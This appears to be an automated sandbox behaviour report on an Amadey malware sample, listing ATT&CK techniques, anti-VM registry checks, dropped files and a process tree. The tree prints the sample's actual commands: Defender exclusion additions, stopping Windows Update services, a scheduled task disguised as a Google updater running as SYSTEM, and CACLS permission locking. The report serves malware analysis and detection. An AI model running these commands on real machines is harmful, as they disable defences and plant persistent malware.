amadey | 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	winlog.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	winlog.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	winlog.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation	A833.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 10 IoCs

pid	Process
3832	A1E8.exe
3088	A833.exe
4292	A95C.exe
4540	oneetx.exe
5044	latestX.exe
1092	taskhost.exe
4016	winlog.exe
4208	msedge.exe
4804	oneetx.exe
4252	ntlhost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	winlog.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	winlog.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{3249926C-12E7-428C-A65C-495EF035D1EC}.catalogItem	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4016	winlog.exe
4252	ntlhost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4700 set thread context of 3504	4700	6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe	89
PID 3832 set thread context of 4460	3832	A1E8.exe	104
PID 1092 set thread context of 1772	1092	taskhost.exe	120

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4908	sc.exe
4424	sc.exe
2600	sc.exe
1152	sc.exe
4624	sc.exe
3624	sc.exe
4904	sc.exe
3800	sc.exe
1016	sc.exe
4248	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
440	4700	WerFault.exe	84

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2980	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	84	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3504	AppLaunch.exe
3504	AppLaunch.exe
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3264	Explorer.EXE

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3504	AppLaunch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	4292	A95C.exe
Token: SeDebugPrivilege	4460	vbc.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	1772	vbc.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeShutdownPrivilege	4896	powercfg.exe
Token: SeCreatePagefilePrivilege	4896	powercfg.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeShutdownPrivilege	980	powercfg.exe
Token: SeCreatePagefilePrivilege	980	powercfg.exe
Token: SeShutdownPrivilege	4784	powercfg.exe
Token: SeCreatePagefilePrivilege	4784	powercfg.exe
Token: SeShutdownPrivilege	4320	powercfg.exe
Token: SeCreatePagefilePrivilege	4320	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1924	powershell.exe
Token: SeSecurityPrivilege	1924	powershell.exe
Token: SeTakeOwnershipPrivilege	1924	powershell.exe
Token: SeLoadDriverPrivilege	1924	powershell.exe
Token: SeSystemProfilePrivilege	1924	powershell.exe
Token: SeSystemtimePrivilege	1924	powershell.exe
Token: SeProfSingleProcessPrivilege	1924	powershell.exe
Token: SeIncBasePriorityPrivilege	1924	powershell.exe
Token: SeCreatePagefilePrivilege	1924	powershell.exe
Token: SeBackupPrivilege	1924	powershell.exe
Token: SeRestorePrivilege	1924	powershell.exe
Token: SeShutdownPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeSystemEnvironmentPrivilege	1924	powershell.exe
Token: SeRemoteShutdownPrivilege	1924	powershell.exe
Token: SeUndockPrivilege	1924	powershell.exe
Token: SeManageVolumePrivilege	1924	powershell.exe
Token: 33	1924	powershell.exe
Token: 34	1924	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3088	A833.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4700 wrote to memory of 3504	4700	6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe	89
PID 4700 wrote to memory of 3504	4700	6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe	89
PID 4700 wrote to memory of 3504	4700	6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe	89
PID 4700 wrote to memory of 3504	4700	6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe	89
PID 4700 wrote to memory of 3504	4700	6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe	89
PID 4700 wrote to memory of 3504	4700	6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe	89
PID 3264 wrote to memory of 3832	3264	Explorer.EXE	103
PID 3264 wrote to memory of 3832	3264	Explorer.EXE	103
PID 3264 wrote to memory of 3832	3264	Explorer.EXE	103
PID 3832 wrote to memory of 4460	3832	A1E8.exe	104
PID 3832 wrote to memory of 4460	3832	A1E8.exe	104
PID 3832 wrote to memory of 4460	3832	A1E8.exe	104
PID 3832 wrote to memory of 4460	3832	A1E8.exe	104
PID 3832 wrote to memory of 4460	3832	A1E8.exe	104
PID 3264 wrote to memory of 3088	3264	Explorer.EXE	105
PID 3264 wrote to memory of 3088	3264	Explorer.EXE	105
PID 3264 wrote to memory of 3088	3264	Explorer.EXE	105
PID 3264 wrote to memory of 4292	3264	Explorer.EXE	106
PID 3264 wrote to memory of 4292	3264	Explorer.EXE	106
PID 3264 wrote to memory of 4292	3264	Explorer.EXE	106
PID 3088 wrote to memory of 4540	3088	A833.exe	107
PID 3088 wrote to memory of 4540	3088	A833.exe	107
PID 3088 wrote to memory of 4540	3088	A833.exe	107
PID 4540 wrote to memory of 2980	4540	oneetx.exe	108
PID 4540 wrote to memory of 2980	4540	oneetx.exe	108
PID 4540 wrote to memory of 2980	4540	oneetx.exe	108
PID 4540 wrote to memory of 4404	4540	oneetx.exe	110
PID 4540 wrote to memory of 4404	4540	oneetx.exe	110
PID 4540 wrote to memory of 4404	4540	oneetx.exe	110
PID 4404 wrote to memory of 3504	4404	cmd.exe	112
PID 4404 wrote to memory of 3504	4404	cmd.exe	112
PID 4404 wrote to memory of 3504	4404	cmd.exe	112
PID 4404 wrote to memory of 4428	4404	cmd.exe	113
PID 4404 wrote to memory of 4428	4404	cmd.exe	113
PID 4404 wrote to memory of 4428	4404	cmd.exe	113
PID 4404 wrote to memory of 4964	4404	cmd.exe	114
PID 4404 wrote to memory of 4964	4404	cmd.exe	114
PID 4404 wrote to memory of 4964	4404	cmd.exe	114
PID 4404 wrote to memory of 4744	4404	cmd.exe	116
PID 4404 wrote to memory of 4744	4404	cmd.exe	116
PID 4404 wrote to memory of 4744	4404	cmd.exe	116
PID 4404 wrote to memory of 920	4404	cmd.exe	115
PID 4404 wrote to memory of 920	4404	cmd.exe	115
PID 4404 wrote to memory of 920	4404	cmd.exe	115
PID 4404 wrote to memory of 5100	4404	cmd.exe	117
PID 4404 wrote to memory of 5100	4404	cmd.exe	117
PID 4404 wrote to memory of 5100	4404	cmd.exe	117
PID 4540 wrote to memory of 5044	4540	oneetx.exe	118
PID 4540 wrote to memory of 5044	4540	oneetx.exe	118
PID 4540 wrote to memory of 1092	4540	oneetx.exe	119
PID 4540 wrote to memory of 1092	4540	oneetx.exe	119
PID 4540 wrote to memory of 1092	4540	oneetx.exe	119
PID 1092 wrote to memory of 1772	1092	taskhost.exe	120
PID 1092 wrote to memory of 1772	1092	taskhost.exe	120
PID 1092 wrote to memory of 1772	1092	taskhost.exe	120
PID 1092 wrote to memory of 1772	1092	taskhost.exe	120
PID 1092 wrote to memory of 1772	1092	taskhost.exe	120
PID 4540 wrote to memory of 4016	4540	oneetx.exe	121
PID 4540 wrote to memory of 4016	4540	oneetx.exe	121
PID 4540 wrote to memory of 4208	4540	oneetx.exe	122
PID 4540 wrote to memory of 4208	4540	oneetx.exe	122
PID 4016 wrote to memory of 4252	4016	winlog.exe	124
PID 4016 wrote to memory of 4252	4016	winlog.exe	124
PID 2604 wrote to memory of 4908	2604	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Users\Admin\AppData\Local\Temp\6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe
  "C:\Users\Admin\AppData\Local\Temp\6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:3504
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 136
    3⤵
    - Program crash
    PID:440
- C:\Users\Admin\AppData\Local\Temp\A1E8.exe
  C:\Users\Admin\AppData\Local\Temp\A1E8.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3832
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4460
- C:\Users\Admin\AppData\Local\Temp\A833.exe
  C:\Users\Admin\AppData\Local\Temp\A833.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:3088
- - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4404
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:3504
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        5⤵
        
        PID:4428
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        5⤵
        
        PID:4964
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:N"
        5⤵
        
        PID:920
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:R" /E
        5⤵
        
        PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe
      "C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Drivers directory
      Executes dropped EXE
      PID:5044
  - - C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1092
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe
      "C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:4016
    - - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        
        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4252
  - - C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe
      "C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      PID:4208
- C:\Users\Admin\AppData\Local\Temp\A95C.exe
  C:\Users\Admin\AppData\Local\Temp\A95C.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1224
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4908
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4424
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3624
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2600
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4904
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2908
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:980
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4784
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4988
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2412
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1152
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4624
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3800
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1016
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4248
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4392
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4532
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1928
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3740
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1184
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4516
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:1724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4700 -ip 4700
1⤵
PID:3632

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:4804

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:4340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery